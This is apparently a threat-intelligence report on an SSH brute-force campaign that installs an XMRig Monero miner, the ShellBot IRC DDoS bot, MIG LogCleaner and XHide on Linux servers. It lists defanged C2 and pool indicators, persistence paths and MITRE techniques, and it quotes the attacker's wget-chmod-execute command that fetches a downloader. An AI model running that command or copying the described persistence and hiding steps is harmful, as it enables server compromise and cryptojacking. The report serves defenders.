# XMRig CoinMiner and ShellBot (PerlBot) Campaign Targeting Linux SSH Servers via SSH Brute-Force

> A long-running threat actor operation, active since at least 2023 and documented by AhnLab ASEC honeypot telemetry through July 2026, brute-forces poorly managed internet-facing Linux SSH servers to deploy an XMRig cryptocurrency miner disguised as the 'mysql' process alongside the ShellBot (PerlBot) IRC-based DDoS botnet, MIG LogCleaner, and XHide process-masking utilities.

- **Published:** 2026-07-14T00:00:00Z
- **Last reviewed:** 2026-07-14T00:00:00Z
- **Canonical:** https://intel.threadlinqs.com/threat/TL-2026-1345
- **ID:** TL-2026-1345
- **Severity:** HIGH
- **Category:** MALWARE
- **Status:** ACTIVE
- **Actor:** XMRig operator
- **Detections:** 9 · **IOCs:** 32 (full data via the Threadlinqs MCP server — Purple tier)

## Description

Threat actors scan the internet for Linux hosts with port 22 (SSH) exposed and run dictionary/brute-force attacks against weak or default SSH credentials. Once valid credentials are obtained and a session established, the attacker issues initial reconnaissance commands and downloads a Go-based downloader ('run') via `wget download.Xrpl[.]City/run && chmod +x run && ./run`. The downloader modifies the compromised user's password (denying re-entry to competing actors and complicating remediation) and retrieves a packaged malware bundle ('pack.jpg') that is unpacked and executed.

The bundle deploys an XMRig-based Monero CoinMiner disguised as the 'mysql' binary, installed to `/etc/ufw/.Dev/oracle-monitor` and `/dev/shm/.Sys_cache_backup` with a systemd persistence unit at `/etc/systemd/system/oracle-service.Service` and cron-based reboot persistence. The miner process is renamed via XHide (h32/h64) argv[0] spoofing to masquerade as legitimate system processes such as irqbalance, systemd-logind, dbus-daemon, or kworker kernel threads, and a watchdog script periodically checks `/dev/shm/` for the miner's presence, re-downloading it if removed. A companion Go-written propagation tool ('meta') scans other hosts on port 22 using bundled credential and IP-range wordlists ('pass'/'ranges'), deploys XMRig to newly compromised systems, and reports campaign telemetry back to `hxxp://youpost[.]In/`.

Alongside the miner, the actor installs ShellBot (also tracked as PerlBot), a Perl-based IRC botnet supporting DDoS command execution, arbitrary system control, and log manipulation, connecting to IRC C2 infrastructure at `Irc[.]Lat:80` (channel #X, admin X) and `Irc.Undernet[.]Org:6667` (channel #T3st, admin Egeu). MIG LogCleaner is deployed alongside ShellBot to purge authentication and shell history logs, hindering forensic reconstruction. The actor further deploys compiled shell-command-compiler (shc) wrapper scripts that alias standard administrative binaries (w→myw, crontab→myc, top→pot, uptime→myu) to hide CPU load, cron entries, and system uptime from defenders, staged under `/usr/share/terminfo/c/.X/.L/` and `/usr/share/terminfo/c/.X/.X/`, with additional persistence via `.bashrc` alias/symlink hijacking.

XMRig connects to a pool of mining relay endpoints (`sad[.]Lat:80`, `192.3.9[.]34:80`, `172.245.81[.]188:80`, `146.19.213[.]82:80`, `23.94.137[.]96:80`) using the command line `-u smart --tls --donate-level=0 --null-hash-report --no-color`; an alternate bundle variant ('auto.jpg') instead mines directly to pool `time.Justnames[.]In:80` under a hardcoded Monero wallet address. ASEC's broader Q4 2025 Linux SSH malware telemetry situates this activity within a wider ecosystem dominated by the P2PInfect worm (80.4% of observed attacks) and Prometei (8.3%), with ShellBot/PerlBot distribution throughout 2025 attributed in ASEC reporting to the long-running Romanian threat group RUBYCARP, which has operated ShellBot-based cryptomining/DDoS campaigns against Linux SSH servers for over a decade; ASEC's July 2026 report does not itself name an actor, so this campaign is tracked as an unattributed but toolset-consistent continuation of that lineage pending stronger attribution evidence.

## MITRE ATT&CK

- T1595 Active Scanning
- T1583 Acquire Infrastructure
- T1588 Obtain Capabilities
- T1110 Brute Force
- T1078 Valid Accounts
- T1021 Remote Services
- T1059 Command and Scripting Interpreter
- T1105 Ingress Tool Transfer
- T1543 Create or Modify System Process
- T1053 Scheduled Task/Job
- T1546 Event Triggered Execution
- T1036 Masquerading
- T1070 Indicator Removal
- T1027 Obfuscated Files or Information
- T1564 Hide Artifacts
- T1082 System Information Discovery
- T1057 Process Discovery
- T1071 Application Layer Protocol
- T1496 Resource Hijacking
- T1498 Network Denial of Service

## Sources

- [Case Study: Distribution of a CoinMiner Targeting Linux SSH Servers via Malware Distribution via Network Transmission](https://asec.ahnlab.com/en/94484/)
- [Statistics Report on Malware Targeting Linux SSH Servers in Q4 2025](https://asec.ahnlab.com/en/92004/)
- [ShellBot Malware Being Distributed to Linux SSH Servers](https://asec.ahnlab.com/en/49769/)
- [ShellBot DDoS Malware Installed Through Hexadecimal Notation Addresses](https://asec.ahnlab.com/en/57635/)
- [ShellBot Uses Hex IPs to Evade Detection in Attacks on Linux SSH Servers](https://thehackernews.com/2023/10/shellbot-uses-hex-ips-to-evade.html)
- [ShellBot DDoS Malware Targets Poorly Managed Linux Servers](https://heimdalsecurity.com/blog/shellbot-ddos-malware-targets-poorly-managed-linux-servers/)
- [New ShellBot bot targets poorly managed Linux SSH Servers](https://securityaffairs.com/143807/cyber-crime/shellbot-targets-linux-ssh-servers.html)

## Full data

Detection queries (Splunk SPL / Microsoft KQL / Sigma) and IOC values require the Threadlinqs MCP server (Purple tier): https://intel.threadlinqs.com/mcp

Canonical: https://intel.threadlinqs.com/threat/TL-2026-1345
